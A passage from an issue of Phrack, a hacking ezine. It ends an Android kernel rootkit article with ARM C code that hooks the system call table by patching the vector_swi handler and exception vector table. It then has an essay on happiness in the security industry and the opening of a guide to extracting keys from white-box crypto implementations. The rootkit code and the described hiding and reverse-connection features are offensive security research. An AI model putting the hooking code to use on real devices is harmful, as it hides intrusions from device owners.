void *swi_addr=(long *)0xffff0008;
|
|
void *vector_swi_ptr=0;
|
|
unsigned long offset=0;
|
|
unsigned long *vector_swi_addr=0,orig_vector_swi_addr=0;
|
|
unsigned long add_r8_pc_addr=0;
|
|
unsigned long ldr_ip_pc_addr=0;
|
|
int i;
|
|
|
|
offset=((*(long *)swi_addr)&0xfff)+8;
|
|
vector_swi_addr=*(unsigned long *)(swi_addr+offset);
|
|
vector_swi_ptr=swi_addr+offset; /* 0xffff0420 */
|
|
orig_vector_swi_addr=vector_swi_addr; /* vector_swi's addr */
|
|
|
|
/* processing __cr_alignment */
|
|
while(vector_swi_addr++){
|
|
if(((*(unsigned long *)vector_swi_addr)&
|
|
0xfffff000)==0xe28f8000){
|
|
add_r8_pc_addr=(unsigned long)vector_swi_addr;
|
|
break;
|
|
}
|
|
/* get __cr_alingment's addr */
|
|
if(((*(unsigned long *)vector_swi_addr)&
|
|
0xfffff000)==0xe59fc000){
|
|
offset=((*(unsigned long *)vector_swi_addr)&
|
|
0xfff)+8;
|
|
ldr_ip_pc_addr=*(unsigned long *)
|
|
((char *)vector_swi_addr+offset);
|
|
}
|
|
}
|
|
/* creating fake vector_swi handler */
|
|
memcpy(new_vector_swi,(char *)orig_vector_swi_addr,
|
|
(add_r8_pc_addr-orig_vector_swi_addr));
|
|
offset=(add_r8_pc_addr-orig_vector_swi_addr);
|
|
for(i=0;i<offset;i+=4){
|
|
if(((*(long *)&new_vector_swi[i])&
|
|
0xfffff000)==0xe59fc000){
|
|
*(long *)&new_vector_swi[i]=0xe59fc020;
|
|
// ldr ip, [pc, #32]
|
|
break;
|
|
}
|
|
}
|
|
/* ldr r8, [pc, #0] */
|
|
*(long *)&new_vector_swi[offset]=0xe59f8000;
|
|
offset+=4;
|
|
/* ldr pc, [pc, #0] */
|
|
*(long *)&new_vector_swi[offset]=0xe59ff000;
|
|
offset+=4;
|
|
/* fake sys_call_table */
|
|
*(long *)&new_vector_swi[offset]=hacked_sys_call_table;
|
|
offset+=4;
|
|
/* jmp original vector_swi's addr */
|
|
*(long *)&new_vector_swi[offset]=(add_r8_pc_addr+4);
|
|
offset+=4;
|
|
/* __cr_alignment's addr */
|
|
*(long *)&new_vector_swi[offset]=ldr_ip_pc_addr;
|
|
offset+=4;
|
|
|
|
/* change the address of vector_swi handler
|
|
within exception vector table */
|
|
*(unsigned long *)vector_swi_ptr=&new_vector_swi;
|
|
|
|
return;
|
|
}
|
|
|
|
This code gets the address which processes the sys_call_table within
|
|
vector_swi handler routine and then copies original contents of vector_swi
|
|
to the fake vector_swi variable before the address we obtained. After
|
|
changing some parts of fake vector_swi to make the code refer _cr_alignment
|
|
function address correctly, we need to add instructions that save the
|
|
address of sys_call_table copy version to r8 register and jump back to the
|
|
original vector_swi handler function. Finally, hooking starts when we
|
|
modify the address of vector_swi handler function within exception vector
|
|
table.
|
|
|
|
|
|
--[ 5.3 - Hooking techniques changing branch instruction offset
|
|
|
|
The second hooking technique to change the branch instruction offset within
|
|
exception vector table is that we don't change vector_swi handler and
|
|
change the offset of 4 byte branch instruction code called automatically
|
|
when the software interrupt occurs.
|
|
|
|
1. Proceed to step 4 like the way in section 5.1.
|
|
2. Store the address of generated fake vector_swi handler routine
|
|
in the specific area within exception vector table.
|
|
3. Change 1 byte which is an offset of 4 byte instruction codes at
|
|
0xffff0008 and store.
|
|
|
|
The code compared with section 5.2 is as follows.
|
|
|
|
- *(unsigned long *)vector_swi_ptr=&new_vector_swi;
|
|
...
|
|
+ *(unsigned long *)(vector_swi_ptr+4)=&new_vector_swi; /* 0xffff0424 */
|
|
...
|
|
+ *(unsigned long *)swi_addr+=4; /* 0xe59ff410 -> 0xe59ff414 */
|
|
|
|
The changed exception vector table after hooking is as follows.
|
|
|
|
# ./coelacanth -e
|
|
[000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch code array
|
|
[004] ffff0004: ea0000dd [Undef] ; b 0x380
|
|
[008] ffff0008: e59ff414 [SWI] ; ldr pc, [pc, #1044] ; 0x424
|
|
[00c] ffff000c: ea0000bb [Abort-perfetch] ; b 0x300
|
|
[010] ffff0010: ea00009a [Abort-data] ; b 0x280
|
|
[014] ffff0014: ea0000fa [Reserved] ; b 0x404
|
|
[018] ffff0018: ea000078 [IRQ] ; b 0x608
|
|
[01c] ffff001c: ea0000f7 [FIQ] ; b 0x400
|
|
[020] Reserved
|
|
... skip ...
|
|
[420] ffff0420: c003df40 [vector_swi]
|
|
[424] ffff0424: bf0ceb5c [new_vector_swi] ; fake vector_swi handler code
|
|
|
|
Hooking starts when the address of a fake vector_swi handler code is stored
|
|
at 0xffff0424 and the 4 byte branch instruction offset at 0xffff0008
|
|
changes the address around 0xffff0424 for reference.
|
|
|
|
|
|
--[ 6 - Conclusion
|
|
|
|
One more time, I thank many pioneers for their devotion and inspiration.
|
|
I also hope various Android rootkit researches to follow. It is a pity
|
|
that I couldn't cover all the ideas that occurred in my mind during
|
|
writing this paper. However, I also think that it is better to discuss
|
|
the advanced and practical techniques next time -if you like this one ;-)-.
|
|
|
|
For more information, the attached example code provides not only file &
|
|
process hiding and kernel module hiding features but also the classical
|
|
rootkit features such as admin privilege succession to specific gid user
|
|
and process privilege changing. I referred to the Defcon 18 whitepaper of
|
|
Christian Papathanasiou and Nicholas J. Percoco for performing the reverse
|
|
connection when we receive a sms message from an appointed phone number.
|
|
|
|
Thanks to:
|
|
vangelis and GGUM for translating Korean into English. Other than those who
|
|
helped me on this paper, I'd like to thank my colleagues, people in my
|
|
graduate school and everyone who knows me.
|
|
|
|
|
|
--[ 7 - References
|
|
|
|
[1] "Abuse of the Linux Kernel for Fun and Profit" by halflife
|
|
[Phrack issue 50, article 05]
|
|
|
|
[2] "Weakening the Linux Kernel" by plaguez
|
|
[Phrack issue 52, article 18]
|
|
|
|
[3] "RUNTIME KERNEL KMEM PATCHING" by Silvio Cesare
|
|
[runtime-kernel-kmem-patching.txt]
|
|
|
|
[4] "Linux on-the-fly kernel patching without LKM" by sd & devik
|
|
[Phrack issue 58, article 07]
|
|
|
|
[5] "Handling Interrupt Descriptor Table for fun and profit" by kad
|
|
[Phrack issue 59, article 04]
|
|
|
|
[6] "trojan eraser or i want my system call table clean" by riq
|
|
[Phrack issue 54, article 03]
|
|
|
|
[7] "yet another article about stealth modules in linux" by riq
|
|
["abtrom: anti btrom" in a mail to Bugtraq]
|
|
|
|
[8] "Saint Jude, The Model" by Timothy Lawless
|
|
[http://prdownloads.sourceforge.net/stjude/StJudeModel.pdf]
|
|
|
|
[9] "IA32 ADVANCED FUNCTION HOOKING" by mayhem
|
|
[Phrack issue 58, article 08]
|
|
|
|
[10] "Android LKM Rootkit" by fred
|
|
[http://upche.org/doku.php?id=wiki:rootkit]
|
|
|
|
[11] "This is not the droid you're looking for..." by Trustwave
|
|
[DEFCON-18-Trustwave-Spiderlabs-Android-Rootkit-WP.pdf]
|
|
|
|
|
|
--[ 8 - Appendix: earthworm.tgz.uu
|
|
|
|
I attach a demo code to demonstrate the concepts which I explained in this
|
|
paper. This code can be used as a real code for attack or just a proof-of-
|
|
concept code. I wish you use this code only for your study not for a bad
|
|
purpose.
|
|
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x07 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ Happy Hacking ]=---------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=--------------------------=[ by Anonymous ]=---------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
-------
|
|
|
|
1. Introduction
|
|
|
|
2. The Happiness Hypothesis
|
|
|
|
3. The consulting industry
|
|
|
|
4. Rebirth
|
|
|
|
5. Conclusions
|
|
|
|
6. References
|
|
|
|
-------
|
|
|
|
--[ 1 - Introduction
|
|
|
|
I've been fascinated with happiness since my college days. Prior to 1998
|
|
psychology focused on fixing people who had problems in an attempt to make
|
|
them more "normal". However, recent trends in psychology have brought a
|
|
whole new field called positive psychology. Positive psychology, or the
|
|
science of Happiness, brings a wealth of research on how normal people can
|
|
achieve greater levels of happiness. As you delve into the subject you will
|
|
discover that most of the conclusions associated with the research into the
|
|
topic of happiness actually runs counter to the popular culture
|
|
understanding of what brings happiness.
|
|
|
|
In this article I'd like to expose some ideas that directly impact the
|
|
hacking scene and specifically as it relates to working in the security
|
|
industry. I'd also like to introduce the idea of hacking happiness.
|
|
|
|
If you could spend a percentage of your time learning about happiness, how
|
|
much happier do you think you could be? Hacking happiness means cutting the
|
|
path to happiness straight to what makes you happy by researching happiness
|
|
just like you would any security topic.
|
|
|
|
Since the article is focused on Happiness as it relates to hacking, there
|
|
are many subjects of positive psychology that we are not going to touch or
|
|
mention. However, if you are interested in reading more about the field,
|
|
Wikipedia has an excellent article on the subject:
|
|
|
|
- http://en.wikipedia.org/wiki/Positive_psychology
|
|
|
|
|
|
--[ 2 - The Happiness Hypothesis
|
|
|
|
Most of the ideas introduced by this article are borrowed from "The
|
|
Happiness Hypothesis" by Jonathan Haidt, which I recommend if you'd like to
|
|
dig deeper into the subject.
|
|
|
|
The first thing about happiness that you should know that research has
|
|
proved is:
|
|
|
|
- "People are very bad at predicting what will bring them happiness." -
|
|
|
|
To expose this idea let me provide an example. Researchers took a look at 2
|
|
different groups of people that had been through completely opposite
|
|
situations, the first group are lottery winners, and the second group are
|
|
people that became paraplegics through some type of accident. Both groups
|
|
were interviewed at 2 different times, once just after the event (winning
|
|
the lottery or becoming paraplegic), and once more again several years
|
|
later. The results of their interviews are quite astonishing.
|
|
|
|
The first group, the lottery winners, as you might expect, had very high
|
|
happiness levels when interviewed shortly after they had won the lottery.
|
|
The second group, those who were newly paralyzed had a very low level of
|
|
happiness, some were even so unhappy that they regretted not dying during
|
|
the accident. These findings are quite obvious and shouldn't be surprising
|
|
to you; however what is astonishing are the results of the second
|
|
interview.
|
|
|
|
Years later, the lottery winners were interviewed again, this time the
|
|
results were quite surprising. As it turns out, their happiness level had
|
|
dropped significantly to levels so low that most of the winners where more
|
|
unhappy now than before winning the lottery. In contrast, the happiness of
|
|
the group of paraplegics was very high, equal to or higher than before the
|
|
accident. So what really happened?
|
|
|
|
To explain this, let me describe the circumstances of the lottery winners.
|
|
Having won the lottery, they thought they had achieved everything they
|
|
wanted, since popular culture equates happiness with material wealth, and
|
|
so their short term happiness level grew quite high. After some time
|
|
though, they started to realize that the money wasn't bringing them the
|
|
happiness they once thought they would achieve when they would be rich.
|
|
Frustrated at the possibility that they would never be able to achieve full
|
|
happiness, their happiness level started dropping. To try to compensate for
|
|
their decreasing happiness level, they started spending money on material
|
|
things, but that was no longer a happiness source. Further exacerbating the
|
|
problem, this new wealth brought new problems (to quote Notorious B.I.G. -
|
|
"Mo money mo problems"). Now family, friends and colleagues were regarded
|
|
as a threat, thinking that all they wanted is to take advantage of their
|
|
new wealth. People around them started asking for loans and favors, which
|
|
led them to distant themselves from their families and friends. Again, in
|
|
order to compensate, they started trying to make new friends that had their
|
|
own wealth status. But breaking the bonds with old friends and family that
|
|
had been established for most of their lives and trying to establish new
|
|
ones, brought a feeling of loneliness that directly correlates to their
|
|
happiness levels significantly dropping.
|
|
|
|
On the other hand those who had become paraplegics relied heavily on their
|
|
families and friends to help them through the rough times, thus
|
|
strengthening the bonds between them. And just like the lottery winners,
|
|
the new circumstances brought back old friends from the past. But unlike
|
|
with lottery winners who's friends came back looking to take advantage of
|
|
their new wealth, these old friends came back for the opposite; they sought
|
|
to help. Another factor associated with the increased happiness was the
|
|
fact that the group that was paralyzed had to learn to cope with being
|
|
paraplegics. Learning to cope with being paraplegics brought an immense
|
|
sense of achievement that made their happiness levels go up. After a few
|
|
years their family relations were stronger than ever; friends were closer
|
|
and their sense of achievement from having overcome their limitations had
|
|
brought them an immense amount of happiness that, when compared to their
|
|
happiness levels before the accident, was equal and most of the times
|
|
higher.
|
|
|
|
If someone were to ask you whether you would choose to become paraplegic or
|
|
win the lottery, it is obvious that everyone would choose to win the
|
|
lottery; however this choice goes against research which has shown that by
|
|
becoming a paraplegic you would ultimately be happier.
|
|
|
|
Obviously I am not saying this is the path you need to choose (if you are
|
|
thinking of doing this, please stop!). I am merely trying to demonstrate
|
|
that the actual road to happiness may force you to look at things in a very
|
|
different and counter intuitive manner.
|
|
|
|
|
|
--[ 3 - The Security Industry
|
|
|
|
In recent years I've seen how many hackers join the information security
|
|
industry and many of them having the illusion that hacking as their day job
|
|
will bring them a great deal of happiness. After a couple of years they
|
|
discover they no longer enjoy hacking, that those feelings they used to
|
|
have in the old days are no longer there, and they decide to blame the
|
|
hacking scene, often condemning it as "being dead".
|
|
|
|
I'll try to explain this behavior from the science of happiness point of
|
|
view.
|
|
|
|
Let me start by looking at Journalism. The science of happiness has shown
|
|
that people are happy in a profession where:
|
|
|
|
- "Doing good (high quality work) matches with doing well (achieving
|
|
wealth and professional advancement) in the field." -
|
|
|
|
Journalism is one of those careers where doing good (making the world
|
|
better by promoting democracy and free press) doesn't usually lead to
|
|
rising as a journalist. Julian Assange, the chief editor of Wikileaks, is
|
|
a pretty obvious example of this. By firmly believing in free press he has
|
|
brought upon himself a great deal of trouble. In contrast, being
|
|
manipulative and exaggerating news often leads to selling more news, which
|
|
in turn allows for the sales of more ads, which correlates to doing well.
|
|
But by doing so, journalists have to compromise their beliefs, which
|
|
ultimately makes their happiness levels go down. Those who decide not to
|
|
compromise feel angry at their profession when they see those who cheat and
|
|
compromise rise high. This feeling also leads to their happiness levels to
|
|
drop. Journalism is therefore one of those professions where its
|
|
practitioners tend to be the most unhappy.
|
|
|
|
Hacking on the other hand doesn't suffer from this issue. In the hacking
|
|
scene doing great work is often recognized and admired. Those hackers that
|
|
are able to write that exploit thought to be impossible, or find that
|
|
unbelievably complex vulnerability, are recognized and praised by the
|
|
community. Also, many hackers tend to develop great tools which are often
|
|
released as open source. The open source community shares a lot of
|
|
properties with the hacking community. It is not hard to see why people
|
|
enjoy developing open source projects so much. Most open source projects
|
|
are community organizations lead by meritocracy; where the best programmers
|
|
can quickly escalate the ranks by writing great code. Furthermore, the idea
|
|
of making the code and the underlying designs widely available gives
|
|
participants a feeling of fulfillment as they are not doing this for profit
|
|
but to contribute to a better world. These ideals have also been an
|
|
integral part of the hacking community where one of its mottos is,
|
|
"Knowledge should be free, information should be free". Being part of such
|
|
communities brings a wealth of happiness, and is the reason why these
|
|
communities flourished without the need for any economic incentives.
|
|
|
|
Recent years however have brought the security industry closer to the
|
|
hacking industry. Many hacking scene members have become security industry
|
|
members once their responsibilities demanded more money (e.g. married with
|
|
kids and a mortgage). For them it seemed like the right fit and the perfect
|
|
job was to hack for a living.
|
|
|
|
However, the security industry does not have the same properties as the
|
|
hacking or open source communities. The security industry is much more like
|
|
the journalism industry.
|
|
|
|
The main difference between the hacking community and the security industry
|
|
is about the consumers of the security industry. While in the hacking
|
|
community the consumers are hackers themselves, in the security industry
|
|
the consumers are companies and other entities that don't have the same
|
|
behavior as hackers. The behavior of the security industry consumers is
|
|
similar to the behavior of the consumers of journalism. This is because
|
|
these companies are partially a subset of the consumers of journalism.
|
|
These consumers do not judge work as hackers do; instead they are more
|
|
ignorant and have a different set of criteria to judge work quality.
|
|
|
|
It is because of this, that once a hacker joins the security industry they
|
|
eventually discover that doing great work no longer means becoming a better
|
|
security professional. They quickly start discovering a whole new set of
|
|
rules to achieve what is considered to be the 'optimal', such as getting
|
|
various industry certifications (CISSP, etc), over-hyping their research
|
|
and its impact to generate press coverage, and often having to compromise
|
|
their ideals in order to protect their source of income (for example the
|
|
"no more free bugs", "no more free techniques" movements).
|
|
|
|
Those deciding that they don't want to be a part of this quickly realize
|
|
that the ones who do are the ones that rise up. Most of them try to fix the
|
|
situation by calling these people out, which often makes the person being
|
|
called out likely criticized by the hacking community. But that is often
|
|
not the case within the security industry were they still enjoy a great
|
|
deal of success.
|
|
|
|
To illustrate further, it has become very prevalent to announce discoveries
|
|
and claim that by making the vulnerability details public catastrophic
|
|
consequences would ensue, as we'll see in the example below. Most of the
|
|
hacking community are quick to criticize this behavior, often ostracizing
|
|
the person making the claim, and in a few cases hacking them in an
|
|
attempt to publicly expose them. However, this practice only has an impact
|
|
within the hacking community. In the security industry an opposite effect
|
|
happens and the person in question achieves a higher status that allows
|
|
him to present in the top security industry conferences. This person is
|
|
also praised for choosing to responsibly disclose the vulnerability thus
|
|
obtaining an overall security status of guru.
|
|
|
|
To illustrate this let's look at a real world example. On July 28, 2009,
|
|
during the Las Vegas based Black Hat Briefings industry conference, the
|
|
ZF05 ezine was released. The ezine featured a number of well respected
|
|
security researchers and how they were hacked. But one of these researchers
|
|
stood out, namely Dan Kaminsky. The reason why he stood out was that one
|
|
year before, a couple of months before Black Hat Briefings, Dan Kaminsky
|
|
decided to announce that he had a critical bug on how DNS servers
|
|
operated [0].
|
|
|
|
Moreover he announced that he had decided, for the benefit of Internet
|
|
security, to release the technical details only during his Black Hat
|
|
Briefings speech that year. The response to this decision was very
|
|
polarized. On one side there was the "vendor" and information security
|
|
industry that praised Dan for following responsible disclosure. On the
|
|
other hand, some of the more prominent security people, criticized this
|
|
approach [1].
|
|
|
|
Dan in turn positioned himself as a martyr, stating that everyone was going
|
|
against him, but he was willing to sacrifice himself in order to protect
|
|
the Internet.
|
|
|
|
When ZF05 was released, Dan Kaminsky's email spool and IRC logs were
|
|
published in it. The released data included a number of emails he exchanged
|
|
during the time he released the DNS bug. The emails showed exactly what
|
|
everyone in the hacking community already knew; that Dan Kaminsky was
|
|
anything but a martyr, and that everything was a large publicity stunt [2].
|
|
|
|
Even though the data were completely embarrassing and publicly exposed Dan
|
|
Kaminsky for what he really was, a master at handling the press, this had
|
|
no impact outside of the hacking community. That year, again, Dan Kaminsky
|
|
took a stand in the Black Hat Briefings conference to deliver a talk, and
|
|
was again praised. He was also later chosen to be the American
|
|
representative who holds the backups of the global DNS root keys [3].
|
|
|
|
This demonstrates that no matter how severe a security industry figure gets
|
|
owned by hackers literally (e.g. publishing their email spools and IRC
|
|
logs) or figuratively (e.g. showing qualitative evidence that their
|
|
research is flawed, stolen, inaccurate or simply unoriginal), these
|
|
individuals continue to enjoy a great deal of respect from the security
|
|
industry. To quote Paris Hilton, "There's no such thing as bad press".
|
|
|
|
With time those that choose not to compromise either live an unhappy life
|
|
frustrated by these so called "hackers" that get their recognition from the
|
|
security industry while they themselves are seen as security consultants
|
|
who just can't market themselves, or they simply choose to change their
|
|
entire career, often burned out and proclaiming that hacking is dead.
|
|
|
|
|
|
--[ 4 - Rebirth
|
|
|
|
Since the idea behind this paper is not to expose anyone, or complain about
|
|
the security industry, we want to leave this aside and move on to what
|
|
exactly a hacker can do to hack happiness.
|
|
|
|
The rebirth section is then a logical reasoning exercise on the different
|
|
paths that are available to a hacker who is also part of the information
|
|
security consulting community, as seen from the happiness maximization
|
|
perspective.
|
|
|
|
The first path is to keep fighting. This path is quite popular; over the
|
|
years we have seen many hackers forming groups and follow this path (el8,
|
|
h0n0, Zero for 0wned, project m4yh3m, etc). But don't get too excited since
|
|
most of the teams that follow this path eventually disintegrate; I'll try
|
|
to explain the reasons why this happens. First, remember that humans are
|
|
very bad at predicting what would bring them happiness. With that in mind,
|
|
most of these groups form with the ideal of exerting a big change onto the
|
|
security community. The problem with this approach is that they really have
|
|
no control over the consumers of the industry, which is exactly where the
|
|
problem really is. As these groups try to exert a change they quickly
|
|
discover that even when their actions lead to undeniable proof of their
|
|
arguments and are completely convincing to other hackers, they don't seem
|
|
to affect regular people. Their initial victories and support from the
|
|
hacking community will bring them a new wave of happiness, but as time goes
|
|
frustration from not being able to have an impact beyond the hacker
|
|
community will then start to build up, which leads to their level of
|
|
happiness to drop, eventually disintegrating the group. You would be wise,
|
|
if you are thinking of taking this path not to take my word for it, but
|
|
just look at the history of the groups that precede you, and then decide.
|
|
|
|
Your other path is simply to ignore all of this and just keep working on
|
|
the sidelines as a security consultant. As someone who was once part of the
|
|
security industry - being on the sidelines without compromising my ideals
|
|
while I saw others which had little skills rise - I can honestly tell you
|
|
it will make you sick. For some people, professional success is a very
|
|
important part of their overall happiness. So if you choose to follow this
|
|
path first make sure that professional success is not a very important part
|
|
of your life. If that is the case, instead focus on other activities from
|
|
which you can derive happiness. One great choice is participating in open
|
|
source projects, or building one yourself. There are of course many other
|
|
alternatives like family, sports etc, all of which can bring you immense
|
|
happiness. On the other hand, if your personality is that of someone very
|
|
ambitious, following this path will make you very unhappy for obvious
|
|
reasons.
|
|
|
|
Finally there is one more path. Simply accepting this is how the security
|
|
industry works (these are the rules of the game), and playing the game. In
|
|
this scenario, as you begin to rise you will discover that in order to
|
|
move higher you are going to have to make some ethical compromises, and by
|
|
doing so to rise up in the information security industry. Unfortunately,
|
|
even though your professional success will bring some happiness with it,
|
|
you will start to feel as if you sold your "soul" to the devil. This
|
|
feeling will start bringing your happiness levels down, and the more you
|
|
compromise the bigger impact this will have. At the same time, you will
|
|
start hating your job for forcing you to compromise your ideals. This in
|
|
effect will cause your professional success to no longer bring you any
|
|
happiness. The combination of both hating your job and compromising your
|
|
ideals will bring your happiness levels very low. Eventually you will
|
|
falsely reach the conclusion that you no longer like hacking, that hacking
|
|
is dead, and this is why you feel so unhappy.
|
|
|
|
Fortunately for you, the security industry is not the only option. Your
|
|
skills and intelligence will be valued in different industries. It is up to
|
|
you to decide what kind of career you would like to pursue. Many hackers
|
|
choose to work as software engineers, which is a very good option since
|
|
they already poses a great deal of knowledge in this area. But you are not
|
|
restricted to the software engineering industry. In fact I've seen cases
|
|
were hackers have chosen careers that have nothing to do with computing,
|
|
far away actually, such as music or art, and they are quite successful and
|
|
happy.
|
|
|
|
This does not mean you are giving up on hacking; in fact it is quite the
|
|
opposite. Many people, including myself, do hacking as a hobby and choose
|
|
to participate in a different industry for our living income. If you choose
|
|
this path you will realize that as being part of this community will bring
|
|
you a lot of happiness. Deep inside you already know this if you are
|
|
reading this article. The real reason you started hacking in the first
|
|
place was not because you were good at it, or because you liked computers;
|
|
it was because it made you happy and there is no reason why this has to
|
|
change.
|
|
|
|
For those of you that have been in the security industry for a while, which
|
|
are unhappy with the current situation and are blaming the hacking
|
|
community for this, don't. Understand that it is not the hacking community
|
|
which has problems but the security industry and that once you start
|
|
hacking as a hobby again those feelings you once had will come back.
|
|
|
|
|
|
--[ 5 - Conclusions
|
|
|
|
I hope I brought some understanding to what makes people happier, what you
|
|
should look into any industry you seek to work in if you want to maximize
|
|
your happiness, and more importantly how the security industry behaves.
|
|
|
|
Hopefully some of you will be able to make better decisions, and ultimately
|
|
the conclusion should be:
|
|
|
|
- Hacking will never die, because ultimately we all want happiness, and
|
|
hacking brings happiness. -
|
|
|
|
HAPPY HACKING!
|
|
|
|
|
|
--[ 6 - References
|
|
|
|
[0] http://dankaminsky.com/2008/07/09/an-astonishing-collaboration/
|
|
[1] https://lists.immunityinc.com/pipermail/dailydave/2008-July/005177.html
|
|
[2] http://attrition.org/misc/ee/zf05.txt
|
|
[3] http://www.root-dnssec.org/tcr/selection-2010/
|
|
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x08 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=--------=[ Practical cracking of white-box implementations ]=---------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=---------------=[ by SysK - whiteb0x [o] phrack o org ]=---------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
-------
|
|
|
|
1 - Introduction
|
|
|
|
2 - What is a WB implementation?
|
|
|
|
3 - The things you should know about white-boxes
|
|
3.1 - Products available
|
|
3.2 - Academic state of the art
|
|
|
|
4 - Handling the first case: hack.lu's challenge
|
|
4.1 - The discovery step
|
|
4.2 - The key recovery
|
|
4.3 - Random thoughts
|
|
|
|
5 - White-boxing the DES
|
|
5.1 - The DES algorithm
|
|
5.2 - An overview of DES WB primitives
|
|
|
|
6 - Breaking the second case: Wyseur's challenge
|
|
6.1 - Efficient reverse engineering of the binary
|
|
6.2 - The discovery step
|
|
6.3 - Recovering the first subkey
|
|
6.4 - Recovering the original key
|
|
|
|
7 - Conclusion
|
|
|
|
8 - Gr33tz
|
|
|
|
9 - References
|
|
|
|
10 - Appendix: Source code
|
|
|
|
-------
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
|
|
This paper is about WB (white-box) cryptography. You may not have heard
|
|
too much about it but if you're focused on reverse engineering and more
|
|
precisely on software protections, then it may be of interest for you.
|
|
|
|
Usually The common way to learn something valuable in cryptography is
|
|
either to read academic papers or cryptography books (when they're written
|
|
by true cryptographers). However as cryptography is about maths, it can
|
|
sometimes seem too theoretical for the average reverser/hacker. I'm willing
|
|
to take a much more practical approach using a combination of both reverse
|
|
engineering and elementary maths.
|
|
|
|
Obviously such a paper is not written for cryptographers but rather for
|
|
hackers or crackers unfamiliar with the concept of white-box and willing to
|
|
learn about it. Considering the quasi non existence of public
|
|
implementations to play with as well as the 'relatively' small amount of
|
|
valuable information on this subject, I hope this will be of interest. Or
|
|
at the very least that it will be a pleasant read... O:-)
|
|
|
|
|
|
--[ 2 - What is a WB implementation?
|
|
|
|
|
|
So let's begin with a short explanation. A white-box is a particular
|
|
implementation of a cryptographic primitive designed to resist to the
|
|
examination of its internals. Consider the case of a binary embedding (and
|
|
using) a symmetric primitive (such as AES for example). With the common
|
|
implementations, the AES key will always leak in memory at some point of
|
|
the execution of the program. This is the classic case of a reverser using
|
|
a debugger. No matter how hard it may be (anti-debug tricks, obfuscation of
|
|
the key, etc.), he will always find a way to intercept the key. White-box
|
|
cryptography techniques were designed to solve this problematic which is
|
|
very common, especially in the field of DRM (Digital Rights Management).
|
|
|
|
So how does it work? The main concept that you should remember is that
|
|
the key is never explicit. Or you could say that it's mathematically
|
|
transformed or 'fused' with the encryption routine. So for one key there is
|
|
one particular obfuscated primitive which is strictly equivalent to the
|
|
original one*. For a same input, both implementations will produce an
|
|
identical output. The mathematical transformation is designed in such a way
|
|
that an attacker with a debugger will not be able to deduce the key from
|
|
the internal state ... at least in a perfect world :-)
|
|
|
|
*: It's not 'exactly' true as we will see later with external encodings.
|
|
|
|
Confused? Then take a look at this tiny example:
|
|
|
|
-> Function1: for x in [0:3] f(x) = (k+x) % 4
|
|
-> Function2: for x in [0:3] g(x) = S[x] with S = [3,0,1,2]
|
|
|
|
If k==3, then the two functions f() and g() are equivalent. However the
|
|
first one explicitly uses the key 'k' whereas the second one doesn't, being
|
|
implemented as a lookup table (LUT). You could say that g() is a white-box
|
|
implementation of f() (albeit a very weak one) for the key 3. While this
|
|
example is easy to understand, you will soon discover that things are more
|
|
complicated with the obfuscation of a whole real life crypto primitive.
|
|
|
|
|
|
--[ 3 - The things you should know about white-boxes
|
|
|
|
|
|
<<<<<<<<<<<<<<<<<< DISCLAIMER <<<<<<<<<<<<<<<<<<
|
|
> I will voluntarily not enter into too much <
|
|
> details. As I said, the paper is based on a <
|
|
> practical approach so let's avoid the maths <
|
|
> for the moment. <
|
|
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
|
|
|
|
|
----[ 3.1 Products available
|
|
|
|
|
|
WB cryptography is essentially implemented in commercial security
|
|
products by a relatively small number of companies (Cloakware -acquired by
|
|
Irdeto-, Whitecryption, Arxan, Syncrosoft, etc.). Usually they provide a
|
|
secure API which is then integrated into other security primitives, often
|
|
for DRM purposes. Amongst other things, they design WB primitives for
|
|
symmetric encryption (DES, AES) but also MAC (HMAC, CMAC) and asymmetric
|
|
primitives (ECC, RSA, DSA).
|
|
|
|
How often do we come across WB in the wild? More than you could think
|
|
of! For example you can see in [R10] that Irdeto has many famous customers
|
|
including TI, Sony, Adobe and NetFLIX. WB cryptography will most likely
|
|
become more and more present in software protections.
|
|
|
|
As far as I can tell, there are unfortunately only 2 public (non
|
|
commercial) examples of WB implementations, both with undisclosed
|
|
generators:
|
|
|
|
- The first historical one is a binary available on Brecht Wyseur's
|
|
website [R04] and is a WB DES implementation. Brecht challenges
|
|
people to find the key:
|
|
|
|
"If you like, try to extract the secret key, using all information
|
|
you can find from this implementation (besides brute-force black-box
|
|
attacks of course)."
|
|
|
|
Keep in mind that this is a challenge, not some production code.
|
|
|
|
- The second one less likely to be known is a challenge proposed by Jb
|
|
for the 2009 edition of hack.lu [R02]. This one is a simplistic AES
|
|
WB but was never labeled officially as such. Part of the challenge is
|
|
indeed to find out (oops!).
|
|
|
|
The cryptanalysis involved is obviously far below the academic state of
|
|
the art but it's nonetheless an interesting one and a first step for who
|
|
wants to be serious and aims at defeating more robust implementations.
|
|
|
|
We'll study both starting with Jb's binary and see how the solution can
|
|
be found in each case.
|
|
|
|
,---.
|
|
,.'-. \
|
|
( ( ,'"""""-.
|
|
`,X `.
|
|
/` ` `._
|
|
( , ,_\
|
|
| ,---.,'o `.
|
|
| / o \ )
|
|
\ ,. ( .____,
|
|
\| \ \____,' \
|
|
'`'\ \ _,____,'
|
|
\ ,-- ,-' \
|
|
( C ,' \
|
|
`--' .' |
|
|
| | .O |
|
|
__| \ ,-'_
|
|
/ `L `._ _,' ' `.
|
|
/ `--.._ `',. _\ `
|
|
`-. /\ | `. ( ,\ \
|
|
_/ `-._ / \ |--' ( \
|
|
' `-. `' \/\`. `. )
|
|
\ -hrr- \ `. | |
|
|
|
|
|
|
----[ 3.2 Academic state of the art
|
|
|
|
|
|
AFAIK academic publications are limited to symmetric encryption and
|
|
especially to DES and AES (though SPN case is somewhat extended in [R08]).
|
|
Explaining the history of the design and the cryptanalysis techniques which
|
|
were developed would be complicated and is already explained with great
|
|
details in the thesis of Brecht Wyseur [R04].
|
|
|
|
